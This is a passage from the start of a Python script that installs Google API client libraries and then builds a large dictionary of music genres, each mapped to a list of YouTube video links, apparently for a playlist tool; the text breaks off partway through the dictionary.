#!/bin/env python3
import base64 
import os,time
import subprocess
from math import sqrt
import json
from collections import OrderedDict
import random
os.system("python3 -m pip install google-auth-oauthlib google-auth google-api-python-client")
import google.auth.transport.requests
from google.oauth2.credentials import Credentials
from google_auth_oauthlib.flow import InstalledAppFlow
from googleapiclient.discovery import build

telpy = False

data = {"genre":{
"EDM":["https://youtube.com/watch?v=PeLj4elwmqc", "https://youtube.com/watch?v=sTmgaP2gYsk", "https://youtube.com/watch?v=l9dxPrp8LEY", "https://youtube.com/watch?v=lAtX3uRp3lM", "https://youtube.com/watch?v=sjrcO6FWzdE", "https://youtube.com/watch?v=SYhvpeWXQH4", "https://youtube.com/watch?v=rh8xgUPu1T0", "https://youtube.com/watch?v=gnV-8pkILF0", "https://youtube.com/watch?v=_QY_QblgBn0", "https://youtube.com/watch?v=y_FkQ2jHd1c"],
"Funk":["https://youtube.com/watch?v=anLOn1B-6Ns", "https://youtube.com/watch?v=0lJrAPXdk-k", "https://youtube.com/watch?v=HMdY9CYBrIU", "https://youtube.com/watch?v=szJn6ayPv-4", "https://youtube.com/watch?v=coif0rpgXF0", "https://youtube.com/watch?v=XSbaaDIVfKM", "https://youtube.com/watch?v=vdqKUy9XKnc", "https://youtube.com/watch?v=OiRakoT1_1U", "https://youtube.com/watch?v=0yXX2Iya490", "https://youtube.com/watch?v=POXjRNVoncU"],
"Country music":["https://youtube.com/watch?v=Z9Q2keLqxio", "https://youtube.com/watch?v=wtO4tWhrcCo", "https://youtube.com/watch?v=-GrjtBhWn4s", "https://youtube.com/watch?v=6HM8YRcWGvE", "https://youtube.com/watch?v=Wq2yI05YuKc", "https://youtube.com/watch?v=Ig86MxQ7p4Y", "https://youtube.com/watch?v=7qaHdHpSjX8", "https://youtube.com/watch?v=c9TrNEqdjVk", "https://youtube.com/watch?v=oFA0MPfzYi0", "https://youtube.com/watch?v=ZEWGyyLiqY4"],
"Hip hop":["https://youtube.com/watch?v=skWeVD9GhPM", "https://youtube.com/watch?v=28hYUZMufDg", "https://youtube.com/watch?v=rwYrEEka1mc", "https://youtube.com/watch?v=_U1sWVTha3Y", "https://youtube.com/watch?v=5qm8PH4xAss", "https://youtube.com/watch?v=awtWnJS7rRs", "https://youtube.com/watch?v=0T3q6gd4r0c", "https://youtube.com/watch?v=jfKfPfyJRdk", "https://youtube.com/watch?v=9s4l0vaGwss", "https://youtube.com/watch?v=Y0N-U04PpUY"],
"Jazz":["https://youtube.com/watch?v=4m-Z78Qu7dc", "https://youtube.com/watch?v=g-uFlFw3BME", "https://youtube.com/watch?v=6r2DiJxHFwE", "https://youtube.com/watch?v=Llour2YvsiI", "https://youtube.com/watch?v=xWXRc2MdAiM", "https://youtube.com/watch?v=-rW6OfyN5aE", "https://youtube.com/watch?v=jpSsyyY-QNg", "https://youtube.com/watch?v=UZbMDg0ksCk", "https://youtube.com/watch?v=ypbaTLa2Wss", "https://youtube.com/watch?v=ZkfUM2FeqvQ"],
"Latin":["https://youtube.com/watch?v=F7wafJvrxl0", "https://youtube.com/watch?v=KH3TjO-PaU0", "https://youtube.com/watch?v=7zjHH7AGngQ", "https://youtube.com/watch?v=UaLm7auE2b0", "https://youtube.com/watch?v=GMcJnyDHM2o", "https://youtube.com/watch?v=MnVdi4muXp4", "https://youtube.com/watch?v=E-zcNpZJX78", "https://youtube.com/watch?v=WUj4TusW2bM", "https://youtube.com/watch?v=e_tUZo5J0NI", "https://youtube.com/watch?v=8wNpMhXnYPk"],
"Pop":["https://youtube.com/watch?v=f6YDKF0LVWw", "https://youtube.com/watch?v=qqy10JMWPAk", "https://youtube.com/watch?v=s-PSzyuosH8", "https://youtube.com/watch?v=HQtFR3mhzOY", "https://youtube.com/watch?v=oorVWW9ywG0", "https://youtube.com/watch?v=TWZKw_MgUPI", "https://youtube.com/watch?v=b1jCt6wkYv0", "https://youtube.com/watch?v=y09NxUvG2x0", "https://youtube.com/watch?v=uNd5kvrGHjk", "https://youtube.com/watch?v=zwpDcA3Y8tY"],
"Punk":["https://youtube.com/watch?v=7GepZxGcjOM", "https://youtube.com/watch?v=ljdq2QYG_xU", "https://youtube.com/watch?v=Ih6TuqmIwcU", "https://youtube.com/watch?v=uZDF2i6kaps", "https://youtube.com/watch?v=QbwTqf6_wh4", "https://youtube.com/watch?v=X7kh4jtSK1g", "https://youtube.com/watch?v=5NV6Rdv1a3I", "https://youtube.com/watch?v=9SNG9ferjiQ", "https://youtube.com/watch?v=XS2nXzjvYsc", "https://youtube.com/watch?v=yCW7Aw8ugOI"],
"Reggae":["https://youtube.com/watch?v=zBbfxNTM9eU", "https://youtube.com/watch?v=0WBvkCDrhh8", "https://youtube.com/watch?v=EIgzgzhDiAA", "https://youtube.com/watch?v=be67OhUSULg", "https://youtube.com/watch?v=z4ScbuTIbgM", "https://youtube.com/watch?v=D-5QJGE9E9o", "https://youtube.com/watch?v=BG5J83BHf50", "https://youtube.com/watch?v=haabtoTxS4o", "https://youtube.com/watch?v=0tTuDl8HlZs", "https://youtube.com/watch?v=Un1NgjMhQIA"],
"Rock":["https://youtube.com/watch?v=Od35460vO5c", "https://youtube.com/watch?v=ZhIsAZO5gl0", "https://youtube.com/watch?v=OhyevGaAfyk", "https://youtube.com/watch?v=v2AC41dglnM", "https://youtube.com/watch?v=hTWKbfoikeg", "https://youtube.com/watch?v=73_EGF1qDIo", "https://youtube.com/watch?v=Nq_6zyW6x3E", "https://youtube.com/watch?v=-tJYN-eG1zk", "https://youtube.com/watch?v=XnUNOaxw6bs", "https://youtube.com/watch?v=6yP1tcy9a10"],
"Heavy Metal":["https://youtube.com/watch?v=-qEla3eow3c", "https://youtube.com/watch?v=MjwttGizNEs", "https://youtube.com/watch?v=C8w8xDGYumk", "https://youtube.com/watch?v=H_V4y4CWYGE", "https://youtube.com/watch?v=K2GBbguLbeg", "https://youtube.com/watch?v=m6p85kZyfoI", "https://youtube.com/watch?v=5abamRO41fE", "https://youtube.com/watch?v=80lKLqLm16I", "https://youtube.com/watch?v=TE5wYP-W1DE", "https://youtube.com/watch?v=yYnHa1G9_Xc"],
"Metal":["https://youtube.com/watch?v=5abamRO41fE", "https://youtube.com/watch?v=C8w8xDGYumk", "https://youtube.com/watch?v=-qEla3eow3c", "https://youtube.com/watch?v=9sTQ0QdkN3Q", "https://youtube.com/watch?v=TE5wYP-W1DE", "https://youtube.com/watch?v=d1cmyOaoZfc", "https://youtube.com/watch?v=iywaBOMvYLI", "https://youtube.com/watch?v=312Sb-2PovA", "https://youtube.com/watch?v=mjF1rmSV1dM", "https://youtube.com/watch?v=mEcYjBwSA8Y"],
"Soul music":["https://youtube.com/watch?v=QbYu0GQSD7s", "https://youtube.com/watch?v=P0OozGOmFDM", "https://youtube.com/watch?v=BLtBiAXVsaM", "https://youtube.com/watch?v=4lTjfDxdazo", "https://youtube.com/watch?v=Q--AM3Y5l5E", "https://youtube.com/watch?v=yhzAkJ-nyH8", "https://youtube.com/watch?v=yaegU6FpB44", "https://youtube.com/watch?v=wQOQD_8rIJ4", "https://youtube.com/watch?v=vilRUEgkHGI", "https://youtube.com/watch?v=cy-7bbETsfA"],
"Polka":["https://youtube.com/watch?v=EwqhI5xaXSQ", "https://youtube.com/watch?v=i2giZNNZXH8", "https://youtube.com/watch?v=A14gZxbn0kM", "https://youtube.com/watch?v=NI3fTby-dko", "https://youtube.com/watch?v=h9gHfwrWfzA", "https://youtube.com/watch?v=CAyWN9ba9J8", "https://youtube.com/watch?v=uMszu_VgMfY", "https://youtube.com/watch?v=MAg613TkbV8", "https://youtube.com/watch?v=e-dzXXClhwI", "https://youtube.com/watch?v=MCdOmlywzIQ"],
"Religious music":["https://youtube.com/watch?v=a0ZjR3SburA", "https://youtube.com/watch?v=rOmTINlRhxM", "https://youtube.com/watch?v=3kDcaMr09Uc", "https://youtube.com/watch?v=nQWFzMvCfLE", "https://youtube.com/watch?v=8TMuAVK2WBQ", "https://youtube.com/watch?v=rVMi2-jbyxo", "https://youtube.com/watch?v=s7jXASBWwwI", "https://youtube.com/watch?v=c7uitqQFmJg", "https://youtube.com/watch?v=XtwIT8JjddM", "https://youtube.com/watch?v=CjQWNj9OQoA"],
"Traditional music":["https://youtube.com/watch?v=VNj8w01iw4w", "https://youtube.com/watch?v=QhjEgUpEADA", "https://youtube.com/watch?v=LnZzZMSM4-4", "https://youtube.com/watch?v=icPnn6W_kbM", "https://youtube.com/watch?v=GwyXQO0tSW4", "https://youtube.com/watch?v=vomY_MkHih4", "https://youtube.com/watch?v=8QjWPNa1Ml0", "https://youtube.com/watch?v=jCExjMUBFvY", "https://youtube.com/watch?v=FAPfjrVb650", "https://youtube.com/watch?v=KepO-GBsqzk"],
"folk music":["https://youtube.com/watch?v=rfYOdl5CAFo", "https://youtube.com/watch?v=G-tblysFVuk", "https://youtube.com/watch?v=Es794hdlOpE", "https://youtube.com/watch?v=8UjJBh_GO2k", "https://youtube.com/watch?v=nif7-fGMSAs", "https://youtube.com/watch?v=V4i55uLwTpY", "https://youtube.com/watch?v=TxU03Bknp5E", "https://youtube.com/watch?v=6Fv-wbsIA2s", "https://youtube.com/watch?v=uJs_8qfkCCo", "https://youtube.com/watch?v=6dQ_Z1gT6pM"],
"House music":["https://youtube.com/watch?v=OFF3rKtQgt4", "https://youtube.com/watch?v=nDlVc7mcl8o", "https://youtube.com/watch?v=9x0e6V5pQIQ", "https://youtube.com/watch?v=CaoWGSoyqjw", "https://youtube.com/watch?v=Ghh7qcyJSJU", "https://youtube.com/watch?v=hqyelPdw_uc", "https://youtube.com/watch?v=WesMXaT1auc", "https://youtube.com/watch?v=V3Fek0vHcyE", "https://youtube.com/watch?v=cnVPm1dGQJc", "https://youtube.com/watch?v=YIglCg2L2rM"],
"Base House music":["https://youtube.com/watch?v=UHbwYFp9cp4", "https://youtube.com/watch?v=b5fm6H0DTeI", "https://youtube.com/watch?v=_bWCHueljcc", "https://youtube.com/watch?v=cnVPm1dGQJc", "https://youtube.com/watch?v=Yp1UKGYf8sI", "https://youtube.com/watch?v=YUOxwynb9UU", "https://youtube.com/watch?v=MlI_FuVuiy0", "https://youtube.com/watch?v=YcTCIMKeiNQ", "https://youtube.com/watch?v=fs6gvrOIWvM", "https://youtube.com/watch?v=z6pjz1kxGpE"],
"Deep House music":["https://youtube.com/watch?v=OFF3rKtQgt4", "https://youtube.com/watch?v=CaoWGSoyqjw", "https://youtube.com/watch?v=Ghh7qcyJSJU", "https://youtube.com/watch?v=9x0e6V5pQIQ", "https://youtube.com/watch?v=hqyelPdw_uc", "https://youtube.com/watch?v=V3Fek0vHcyE", "https://youtube.com/watch?v=7JoroCCJhgA", "https://youtube.com/watch?v=nDlVc7mcl8o", "https://youtube.com/watch?v=als7xoyNyoE", "https://youtube.com/watch?v=WesMXaT1auc"],
"Dubstep":["https://youtube.com/watch?v=dBb060OPegg", "https://youtube.com/watch?v=YJVmu6yttiw", "https://youtube.com/watch?v=RxLQ9boJJCE", "https://youtube.com/watch?v=aHjpOzsQ9YI", "https://youtube.com/watch?v=JQ1txLdu6qg", "https://youtube.com/watch?v=dLyH94jNau0", "https://youtube.com/watch?v=PfrRJYC4z6I", "https://youtube.com/watch?v=8aLtBkWvEZg", "https://youtube.com/watch?v=KcoH8aFaG9o", "https://youtube.com/watch?v=a4JlkKNA3yw"],
"Redeem":["https://youtube.com/watch?v=srZi3j2dtC4", "https://youtube.com/watch?v=TZrxNZibe_I", "https://youtube.com/watch?v=55s3T7VRQSc", "https://youtube.com/watch?v=-SPml8cMSkQ", "https://youtube.com/watch?v=yv5xonFSC4c", "https://youtube.com/watch?v=2Dp4GHIVY4E", "https://youtube.com/watch?v=vg2kjAf0aYI", "https://youtube.com/watch?v=N_X1c9RT5dc", "https://youtube.com/watch?v=myVZOHWPqBE", "https://youtube.com/watch?v=VzGAYNKDyIU"],
"A Cappella":["https://youtube.com/watch?v=9MimUt8mGPE", "https://youtube.com/watch?v=2EtalOOS-eM", "https://youtube.com/watch?v=BQ3VtEDdM5k", "https://youtube.com/watch?v=bpclDVK18rw", "https://youtube.com/watch?v=6J43Ph0jHvc", "https://youtube.com/watch?v=_M98AO-xfho", "https://youtube.com/watch?v=rcLl0A-lXIc", "https://youtube.com/watch?v=X6Mtpk4jeVA", "https://youtube.com/watch?v=VQbQgdLopd4", "https://youtube.com/watch?v=zda8H32pyeI"],
"Abstract":["https://youtube.com/watch?v=lbCh94nJqIo", "https://youtube.com/watch?v=wjQq0nSGS28", "https://youtube.com/watch?v=2ZTF40-huHg", "https://youtube.com/watch?v=0vsnwUJjunU", "https://youtube.com/watch?v=L3Dp4oGkn3k", "https://youtube.com/watch?v=BDpqt-haLLM", "https://youtube.com/watch?v=Nt-ZvxJy8hY", "https://youtube.com/watch?v=pmBRefZ7mNA", "https://youtube.com/watch?v=LCfBYE97rFk", "https://youtube.com/watch?v=SVMJHVAU2QQ"],
"Abstract Beats":["https://youtube.com/watch?v=2C9JeSiiSOg", "https://youtube.com/watch?v=W_hUfS2B258", "https://youtube.com/watch?v=SSZCN-NOFV0", "https://youtube.com/watch?v=SJbFEQmPY8g", "https://youtube.com/watch?v=zGNlTvIbjLo", "https://youtube.com/watch?v=3keSS2rtSTI", "https://youtube.com/watch?v=2G5eLgcAGnc", "https://youtube.com/watch?v=fsHCWE4y-uI", "https://youtube.com/watch?v=4edVpPeLE6A", "https://youtube.com/watch?v=KxhCMy9E9aQ"],
"Abstract Hip Hop":["https://youtube.com/watch?v=did91bVt-Cg", "https://youtube.com/watch?v=3q8nGnls1Ow", "https://youtube.com/watch?v=EB6-PQ1hAVc", "https://youtube.com/watch?v=aVH7ru2Ndt0", "https://youtube.com/watch?v=SJbFEQmPY8g", "https://youtube.com/watch?v=SSZCN-NOFV0", "https://youtube.com/watch?v=7YdVfZ4Kcw0", "https://youtube.com/watch?v=fsHCWE4y-uI", "https://youtube.com/watch?v=AXETmFBJ0G4", "https://youtube.com/watch?v=Ay2TfMfTgnE"],
"Abstract Idm":["https://youtube.com/watch?v=4bYVmEV9Nkc", "https://youtube.com/watch?v=G8knsXI_Zlw", "https://youtube.com/watch?v=muuc3E1lNX0", "https://youtube.com/watch?v=2om5_sNlez8", "https://youtube.com/watch?v=LYRD0lbSEIU", "https://youtube.com/watch?v=hVhERj8zrwE", "https://youtube.com/watch?v=CdDk-MgDeko", "https://youtube.com/watch?v=4oxGHCb-De8", "https://youtube.com/watch?v=SQNPzLh_mTw", "https://youtube.com/watch?v=uTmJdATdJl8"],
"Abstractro":["https://youtube.com/watch?v=E63YdFq8s_4", "https://youtube.com/watch?v=tIFYHz9ITSw", "https://youtube.com/watch?v=AYK_HhrTEEc", "https://youtube.com/watch?v=Ixz-_ShJDrA", "https://youtube.com/watch?v=roxZikNDf3E", "https://youtube.com/watch?v=tCoCKkpWyNU", "https://youtube.com/watch?v=qbqBfVbzLo0", "https://youtube.com/watch?v=7l8yZa37qIQ", "https://youtube.com/watch?v=xAaCG5ea5Fk", "https://youtube.com/watch?v=k8TYgAnFRd0"],
"Accordion":["https://youtube.com/watch?v=Up2DJd4VSps", "https://youtube.com/watch?v=AGbGbzHLpz8", "https://youtube.com/watch?v=KLAAqvvRQBo", "https://youtube.com/watch?v=eDFFUIGoBUc", "https://youtube.com/watch?v=nwXY0II9-Mo", "https://youtube.com/watch?v=aEE8IM3ukC8", "https://youtube.com/watch?v=bTvNSCO-e1g", "https://youtube.com/watch?v=NnBDHPSw_wA", "https://youtube.com/watch?v=bGCHT6fIEBw", "https://youtube.com/watch?v=rpaonSDPw7Y"],
"Acid House":["https://youtube.com/watch?v=ZrLPz4QGRJ8", "https://youtube.com/watch?v=pUis_KwzwCc", "https://youtube.com/watch?v=VfcEAfmNVGM", "https://youtube.com/watch?v=JULa1UQvafM", "https://youtube.com/watch?v=yrxPNPP3dxE", "https://youtube.com/watch?v=CtwSjr3SS_g", "https://youtube.com/watch?v=-7C3xa4cERg", "https://youtube.com/watch?v=0Ej9AkoMAoQ", "https://youtube.com/watch?v=2LUosE4AAQE", "https://youtube.com/watch?v=pZs8VQ6LxsY"],
"Acid Jazz":["https://youtube.com/watch?v=EbMm87H7LAw", "https://youtube.com/watch?v=pa2hZbZxtjk", "https://youtube.com/watch?v=c_8lTmmZnos", "https://youtube.com/watch?v=S6lDGgs7jAc", "https://youtube.com/watch?v=QK2mtWjtyDU", "https://youtube.com/watch?v=ptSWv3IZUYQ", "https://youtube.com/watch?v=QJyRG4s9YXU", "https://youtube.com/watch?v=eaRhetAoqEw", "https://youtube.com/watch?v=PuU6b6Seh9c", "https://youtube.com/watch?v=rPo9sbAcbd4"],
"Acid Techno":["https://youtube.com/watch?v=OHqdhk6WxMM", "https://youtube.com/watch?v=VfcEAfmNVGM", "https://youtube.com/watch?v=pUis_KwzwCc", "https://youtube.com/watch?v=HVzo2reJIqw", "https://youtube.com/watch?v=-7C3xa4cERg", "https://youtube.com/watch?v=wRYNfaJ3v14", "https://youtube.com/watch?v=CtwSjr3SS_g", "https://youtube.com/watch?v=JqpZIsdTnSw", "https://youtube.com/watch?v=jXReycydasw", "https://youtube.com/watch?v=dPEyS572L9g"],
"Acousmatic":["https://youtube.com/watch?v=s1S7rbPhvdw", "https://youtube.com/watch?v=ipUoRpVK32s", "https://youtube.com/watch?v=9I6F18QM5fs", "https://youtube.com/watch?v=e8NU95x80MI", "https://youtube.com/watch?v=I7l14sAoL7M", "https://youtube.com/watch?v=_G68Q4gkOMc", "https://youtube.com/watch?v=51yy89_ZHbI", "https://youtube.com/watch?v=tljta5gIPJc", "https://youtube.com/watch?v=9JeT1Es1kHA", "https://youtube.com/watch?v=ioMFcy-Ul3Y"],
"Acoustic Blues":["https://youtube.com/watch?v=g-ns-1mRbCM", "https://youtube.com/watch?v=7sZp0XzHNJ8", "https://youtube.com/watch?v=RljE0XwuQpI", "https://youtube.com/watch?v=-tpzMfwetZM", "https://youtube.com/watch?v=zdBGqWnpDRk", "https://youtube.com/watch?v=CbptmMqkuNA", "https://youtube.com/watch?v=5lDsPSaSmTM", "https://youtube.com/watch?v=n6AVMQgQqkk", "https://youtube.com/watch?v=s4ACjyobAug", "https://youtube.com/watch?v=-ZUvpuBpT7Q"],
"Acoustic Pop":["https://youtube.com/watch?v=_UucPr2M-qU", "https://youtube.com/watch?v=oUlyVO5G5Go", "https://youtube.com/watch?v=MyoHTAc6rT0", "https://youtube.com/watch?v=8J1HLEF2MgU", "https://youtube.com/watch?v=X-yJhGcS7U4", "https://youtube.com/watch?v=1lpqa2FygsI", "https://youtube.com/watch?v=lbmE_NvLe1w", "https://youtube.com/watch?v=thyHHCj0CZk", "https://youtube.com/watch?v=sg9OsWVUIls", "https://youtube.com/watch?v=GGrCJ0Vovkg"],
"Adult Standards":["https://youtube.com/watch?v=tSs8gwhm18c", "https://youtube.com/watch?v=jLBMXblXoP4"],
"African Percussion":["https://youtube.com/watch?v=zSdwo_qsXS4", "https://youtube.com/watch?v=FOY9fLm3eYI", "https://youtube.com/watch?v=kZHfmgIb4mc", "https://youtube.com/watch?v=ljaDvXa2Nac", "https://youtube.com/watch?v=gel94sjJOOo", "https://youtube.com/watch?v=5wZ7AqBiA6o", "https://youtube.com/watch?v=8N_yn8mJOU8", "https://youtube.com/watch?v=P6Rvsd-nWYc", "https://youtube.com/watch?v=9b81mWYIyTo", "https://youtube.com/watch?v=VDbFOJf__jw"],
"African Rock":["https://youtube.com/watch?v=NzM9tXKAmzY", "https://youtube.com/watch?v=uVukxsAZObc", "https://youtube.com/watch?v=jWJAvmjfCFI", "https://youtube.com/watch?v=GZvPoE0EH1o", "https://youtube.com/watch?v=FTQbiNvZqaY", "https://youtube.com/watch?v=9J3lwZjHenA", "https://youtube.com/watch?v=vACZA9dGvV4", "https://youtube.com/watch?v=Ig91Z0-rBfo", "https://youtube.com/watch?v=mk5Dwg5zm2U", "https://youtube.com/watch?v=Jk1JXc9ifRQ"],
"Afrikaans":["https://youtube.com/watch?v=uI49IqDCgg8", "https://youtube.com/watch?v=m3TTi_gAS5c", "https://youtube.com/watch?v=xwr0AxdfqRE", "https://youtube.com/watch?v=1X6h-hA0dAA", "https://youtube.com/watch?v=dolLuO9hM5s", "https://youtube.com/watch?v=a3MoVsoesLw", "https://youtube.com/watch?v=eH7gaFCKdlA", "https://youtube.com/watch?v=4If0-tT_t_4", "https://youtube.com/watch?v=CYOIbXJTVIc", "https://youtube.com/watch?v=rhBhVsjvJTs"],
"Afrobeat":["https://youtube.com/watch?v=qUH5I_jKRB0", "https://youtube.com/watch?v=6KLWw18Jwk8", "https://youtube.com/watch?v=VEy9I96c5_Y", "https://youtube.com/watch?v=aNB3q9OuaPY", "https://youtube.com/watch?v=OSBan_sH_b8", "https://youtube.com/watch?v=WWmZZ6N8p78", "https://youtube.com/watch?v=dNt1QR1ecuM", "https://youtube.com/watch?v=Pd0g_zgaPTY", "https://youtube.com/watch?v=MJOGVMeokio", "https://youtube.com/watch?v=cR3fpaIQL_E"],
"Afrobeats":["https://youtube.com/watch?v=qUH5I_jKRB0", "https://youtube.com/watch?v=6KLWw18Jwk8", "https://youtube.com/watch?v=OSBan_sH_b8", "https://youtube.com/watch?v=aNB3q9OuaPY", "https://youtube.com/watch?v=dNt1QR1ecuM", "https://youtube.com/watch?v=VEy9I96c5_Y", "https://youtube.com/watch?v=4j7Fa2PCMow", "https://youtube.com/watch?v=b_LeDVJRLhw", "https://youtube.com/watch?v=W1Uioqmyntw", "https://youtube.com/watch?v=z2wRa_Lxar4"],
"Aggrotech":["https://youtube.com/watch?v=S1Wkr9tzA0c", "https://youtube.com/watch?v=b4ZwY2851Eg", "https://youtube.com/watch?v=0AlAV3qH3yw", "https://youtube.com/watch?v=c0WActw9OpI", "https://youtube.com/watch?v=S7-jhox8BlY", "https://youtube.com/watch?v=ztil137OemU", "https://youtube.com/watch?v=lDFBimWTEtM", "https://youtube.com/watch?v=M9ee-CNqLKs", "https://youtube.com/watch?v=_zjWZ56Ygys", "https://youtube.com/watch?v=lk8lBqiqYaM"],
"Albanian Pop":["https://youtube.com/watch?v=cedoBlUvBlI", "https://youtube.com/watch?v=O7rmHSiGk-4", "https://youtube.com/watch?v=GCpvmHi1gxU", "https://youtube.com/watch?v=6_ardA6TuX0", "https://youtube.com/watch?v=EemrcJZ24KM", "https://youtube.com/watch?v=x60stGTUjDk", "https://youtube.com/watch?v=qcVt9-LqpJI", "https://youtube.com/watch?v=lB64nP1CNXg", "https://youtube.com/watch?v=QpBhza4gjTY", "https://youtube.com/watch?v=RHuC7YakdSs"],
"Album Rock":["https://youtube.com/watch?v=EaUHDBXn9wg", "https://youtube.com/watch?v=ksNj-0SKZG0", "https://youtube.com/watch?v=fj49ieVlZ6U", "https://youtube.com/watch?v=U9rSIYX8ukA", "https://youtube.com/watch?v=BrrO2q9VwRM", "https://youtube.com/watch?v=4no36RMWFME", "https://youtube.com/watch?v=U_tyfMUSGo4", "https://youtube.com/watch?v=FDMq9ie0ih0", "https://youtube.com/watch?v=fk7jaAeE-vU", "https://youtube.com/watch?v=LQ3G7QaYgMA"],
"Albuquerque Indie":["https://youtube.com/watch?v=-KeWvfsnS48", "https://youtube.com/watch?v=ooI3u4uzEss", "https://youtube.com/watch?v=4uSSYb64xjw", "https://youtube.com/watch?v=wJoscdBTWE4", "https://youtube.com/watch?v=9HJfqZHa9a4", "https://youtube.com/watch?v=BpcNEWLjYII", "https://youtube.com/watch?v=U93SeLnQxCs", "https://youtube.com/watch?v=6Kl4s2LJp7s", "https://youtube.com/watch?v=t0KikSWn2fQ", "https://youtube.com/watch?v=lS3-LsxY00o"],
"Alternative Americana":["https://youtube.com/watch?v=fuBsVD3KuhU", "https://youtube.com/watch?v=Ya2f7mJsn9w", "https://youtube.com/watch?v=akCn5n16t2g"],
"Alternative Country":["https://youtube.com/watch?v=L-UJ5WFcscM", "https://youtube.com/watch?v=klSC9QzmGzo", "https://youtube.com/watch?v=se8LqQqK7T0", "https://youtube.com/watch?v=w97Sc2ZAiPI", "https://youtube.com/watch?v=VZL6qHFRqJQ", "https://youtube.com/watch?v=o9ux39saCq4", "https://youtube.com/watch?v=sZFdLBrpjGY", "https://youtube.com/watch?v=UxdOR8cvhrY", "https://youtube.com/watch?v=_bto0UKEZNA", "https://youtube.com/watch?v=jHnSj9Ls6pU"],
"Alternative Dance":["https://youtube.com/watch?v=mz4VjDQyLOI", "https://youtube.com/watch?v=nXOOrxdW7C8", "https://youtube.com/watch?v=Hs3wt0huhuQ", "https://youtube.com/watch?v=BVKQaectXjY", "https://youtube.com/watch?v=2chfsFTNEXw", "https://youtube.com/watch?v=r9VMdogSAcU", "https://youtube.com/watch?v=8wCvC2fKN7Y", "https://youtube.com/watch?v=mEj6ZxAWjJU", "https://youtube.com/watch?v=9E9ufQYqfYI", "https://youtube.com/watch?v=4EK4E9nCeYI"],
"Alternative Emo":["https://youtube.com/watch?v=DrTeLd7q1l8", "https://youtube.com/watch?v=3gXnslOK2Rg", "https://youtube.com/watch?v=A6S8y7Eiusg", "https://youtube.com/watch?v=_8XhfP_9LjY", "https://youtube.com/watch?v=-CPCHXUU4Is", "https://youtube.com/watch?v=rrSYDWLucjI", "https://youtube.com/watch?v=qjg10RUeq1g", "https://youtube.com/watch?v=4FB579lAWV8", "https://youtube.com/watch?v=fv7HdsifMn0", "https://youtube.com/watch?v=OYahr6bNA-k"],
"Alternative Hardcore":["https://youtube.com/watch?v=mAMifYBS_Pc", "https://youtube.com/watch?v=8HNcXTTt25M", "https://youtube.com/watch?v=tWTPGVIw1es", "https://youtube.com/watch?v=k2NpCS-F308", "https://youtube.com/watch?v=pjJVEgMOdIM", "https://youtube.com/watch?v=fei7YqlL1lg", "https://youtube.com/watch?v=F0OkcI7XiQ4", "https://youtube.com/watch?v=Zhv6XGcip3Q", "https://youtube.com/watch?v=8qTCHSLjx44", "https://youtube.com/watch?v=PHTlmTN743A"],
"Alternative Hip Hop":["https://youtube.com/watch?v=86XzuPmMriw", "https://youtube.com/watch?v=8LTN6AyI4Zw", "https://youtube.com/watch?v=pyPl9A_PQU8", "https://youtube.com/watch?v=OC7cNS0GINo", "https://youtube.com/watch?v=xKmttjCq5x8", "https://youtube.com/watch?v=a-mAK3uB2_0", "https://youtube.com/watch?v=8mUnm1dghRY", "https://youtube.com/watch?v=YEVwTKkNUAM", "https://youtube.com/watch?v=W0-VooU0TZA", "https://youtube.com/watch?v=GlUPGI7pElA"],
"Alternative Metal":["https://youtube.com/watch?v=JN5srGNIqiE", "https://youtube.com/watch?v=6Vugt2F__no", "https://youtube.com/watch?v=edk_hWSVe7E", "https://youtube.com/watch?v=wY_X09KW57M", "https://youtube.com/watch?v=UKVB3AtTSWg", "https://youtube.com/watch?v=pgVszMEGZSM", "https://youtube.com/watch?v=uKviGWfRPDM", "https://youtube.com/watch?v=axzIBI99NMI", "https://youtube.com/watch?v=y9rUP_fZoEU", "https://youtube.com/watch?v=ztmCnR0W1pk"],
"Alternative Metalcore":["https://youtube.com/watch?v=EsJ-9OjefXM", "https://youtube.com/watch?v=Rl8Kg-WejDY", "https://youtube.com/watch?v=YHzinY2__hQ", "https://youtube.com/watch?v=9T6PXX7X2ro", "https://youtube.com/watch?v=9R8-rS_jano", "https://youtube.com/watch?v=R3sUD6yDSPQ", "https://youtube.com/watch?v=WlAO1dUjxcI", "https://youtube.com/watch?v=eZRJggJjaks", "https://youtube.com/watch?v=UHQPzSkUQWE", "https://youtube.com/watch?v=YhPqreMl_0M"],
"Alternative New Age":["https://youtube.com/watch?v=LDNBKff6g_E", "https://youtube.com/watch?v=8wCvC2fKN7Y", "https://youtube.com/watch?v=TjNSmEvqWxU", "https://youtube.com/watch?v=jquaQnT3ec4", "https://youtube.com/watch?v=UKVB3AtTSWg", "https://youtube.com/watch?v=m-cFq9wEilw", "https://youtube.com/watch?v=STb1HnT6AQg", "https://youtube.com/watch?v=hrwRAjCr_lA", "https://youtube.com/watch?v=YVBFjYsPbek", "https://youtube.com/watch?v=TzAnZTa3O0k"],
"Alternative Pop":["https://youtube.com/watch?v=HPtMNclW1R4", "https://youtube.com/watch?v=-YgXZs3Ezwo", "https://youtube.com/watch?v=nif7-fGMSAs", "https://youtube.com/watch?v=26fa74O0ahg", "https://youtube.com/watch?v=wY_X09KW57M", "https://youtube.com/watch?v=xiUhNx24iZs", "https://youtube.com/watch?v=ib9GwYpZLJM", "https://youtube.com/watch?v=cOjYAFS24gc", "https://youtube.com/watch?v=2chfsFTNEXw", "https://youtube.com/watch?v=bm0XIfbfKp4"],
"Alternative Pop Rock":["https://youtube.com/watch?v=XnUNOaxw6bs", "https://youtube.com/watch?v=6StNYPVfPwU", "https://youtube.com/watch?v=rwFjMUGoroo", "https://youtube.com/watch?v=uRImXboQnzE", "https://youtube.com/watch?v=98zf2qAFzUE", "https://youtube.com/watch?v=AS_x4uR87Kw", "https://youtube.com/watch?v=BCZ88nRe9x0", "https://youtube.com/watch?v=WrnauRHpY40", "https://youtube.com/watch?v=myDW_WPRHq0"],
"Alternative R&amp;b":["https://youtube.com/watch?v=86XzuPmMriw", "https://youtube.com/watch?v=Qx8S8haQP2U", "https://youtube.com/watch?v=zulciv8PpGw", "https://youtube.com/watch?v=qj65f7niNFg", "https://youtube.com/watch?v=5b35haQV7tU", "https://youtube.com/watch?v=-6BuPLUaadc", "https://youtube.com/watch?v=2OTyS0Z8t9M", "https://youtube.com/watch?v=sG7qP0TcmHw", "https://youtube.com/watch?v=krH0cwpV5Cs", "https://youtube.com/watch?v=pWCUKN0RLYg"],
